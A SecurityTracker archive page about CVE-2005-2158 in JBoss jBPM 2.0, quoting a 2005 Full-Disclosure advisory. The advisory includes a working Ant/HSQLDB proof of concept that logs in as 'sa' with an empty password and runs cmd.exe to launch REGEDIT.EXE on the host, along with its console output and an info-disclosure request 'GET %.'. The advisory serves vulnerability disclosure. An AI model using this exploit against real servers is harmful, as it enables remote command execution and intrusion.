SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Red Hat JBoss jBPM Vendors:   JBoss Group
JBoss jBPM Lets Remote Users Execute Arbitrary Applications and Obtain System Information Disclosure
SecurityTracker Alert ID:  1014370
SecurityTracker URL:  http://securitytracker.com/id/1014370
CVE Reference:   CVE-2005-2158   (Links to External Site)
Updated:  Jul 7 2005
Original Entry Date:  Jul 3 2005
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Vendor Confirmed:  Yes  
Version(s): 2.0
Description:   Two vulnerabilities were reported in JBoss jBPM. A remote user can execute arbitrary applications on the target system. A remote user can obtain system information.

The HSQLDB support contains a flaw that allows a remote user to execute arbitrary applications on the target system. The application will run with the privileges of the JBoss process.

A remote user can submit a specially crafted HTTP request to cause the jBPM process to disclose the installation path or other system information. The flaw resides in the 'org.jboss.web.WebServer' class. A demonstration exploit request is provided:

GET %.

The underlying vulnerabilities existed in JBoss but have been corrected.

The vendor was notified on June 22, 2005.

Marc Schoenefeld reported these vulnerabilities.

Impact:   A remote user can execute arbitrary applications on the target system with the privileges of the JBoss process.

A remote user can obtain system information, such as the installation path and system version.

Solution:   No solution was available at the time of this entry.

The vendor plans to issue a fix in version 2.0.1.

Vendor URL:  www.jboss.org/products/jbpm (Links to External Site)
Cause:   Access control error
Underlying OS:  Java, Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] JBoss jBPM 2.0: Remote code execution and


Security Advisory: jBPM 2.0
Date:  06/22/05
URL: http://www.illegalaccess.org/java/jbpm.php

" JBoss jBPM is a flexible, extensible workflow management system."
[jbpm.org]

Problem 1: Remote code execution possible with jBPM .
This allows an attacker to trigger an arbitrary executable on the jBPM/
JBoss host
with the access control rights of the JBoss process. The example
triggers REGEDIT.EXE.

Due to a known vulnerability in the underlying JBoss 3.2.x and its
embedded HSQLDB
the jBPM system is vulnerable to remote code execution. This is a
regression bug from the
default installation of JBoss 3.2.1. It was fixed in JBoss 3.2.2.
Visit http://www.illegalaccess.org/java/jboss.php for more info.
The following ant file snippet demostrates the problem by calling
regedit on
the Jboss host machine running on JDK 1.4.2. For JDK 1.5.0 the names of
the exploited classes have to be modified slightly.

<target name="cmdinject">
<sql
   classpath="hsqldb.jar"
   driver="org.hsqldb.jdbcDriver"
   url="jdbc:hsqldb:hsql://${host}:${port}"
   userid="sa"
   password=""
   print = "true"
   >
CREATE ALIAS COMPDEBUG FOR
"org.apache.xml.utils.synthetic.JavaUtils.setDebug"
CREATE ALIAS SETPROP FOR "java.lang.System.setProperty";
CREATE ALIAS COMPILE FOR
"org.apache.xml.utils.synthetic.JavaUtils.JDKcompile";

CALL COMPDEBUG(true);
CALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe');
CALL COMPILE('/c REGEDIT.EXE','');
</sql>
</target>

Result: REGEDIT.EXE pops up and the following info is printed on the
console when running
ant with the build.xml above.
>>ant
>>Buildfile: build.xml
>>
>> cmdinject:
>>       [sql] Executing commands
>>       [sql] 0 rows affected
>>       [sql] 0 rows affected
>>
>>       [sql] null
>>
>>       [sql] 0 rows affected
>>
>>       [sql] null
>>
>>       [sql] 0 rows affected
>>
>>       [sql] true
>>
>>       [sql] 0 rows affected
>>       [sql] 5 of 5 SQL statements executed successfully
>>
>> BUILD SUCCESSFUL
>> Total time: 3 seconds


Problem 2: JBoss class loader covert channel
The default installation of JPBM reveals the path of the installation
directory and allows fingerprinting of the server software version by an
unauthenticated HTTP request.
This is due to an information leak bug in the org.jboss.web.WebServer
class of  the bundled JBoss container 3.2.5. that creates a covert channel
between the webserver and the class loader.
When confronted with an expected HTTP request such as 'GET %.' the
org.jboss.web.WebServer class reveals system platform information useful
for an attacker. Due to
the classloader architecture the RMI class download service on port 8083
also allows an attacker to
fingerprint the version of the JBoss server.

- Example 2a (Installation path disclosure):  [same as previous bugtraq
posting on JBoss published on Jun 18 2005 ]
- Example 2b (Config file download): [same as previous bugtraq posting
on JBoss published on Jun 18 2005 ]
- Example 2c (Login config and database credential disclosure): [same as
previous bugtraq posting on JBoss published on Jun 18 2005 ]

Workaround:
The jBPM team was contacted on 6/22/05 and will fix the configuration
bugs in jBPM 2.0.1
It should be noted that every JBoss based system is vulnerable to the
Problem 2 issue, when
it uses the service on port 8083. Of course, every JBoss system that has
the port 1701 open for HSQLDB
is vulnerable to the Problem 2 issue.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC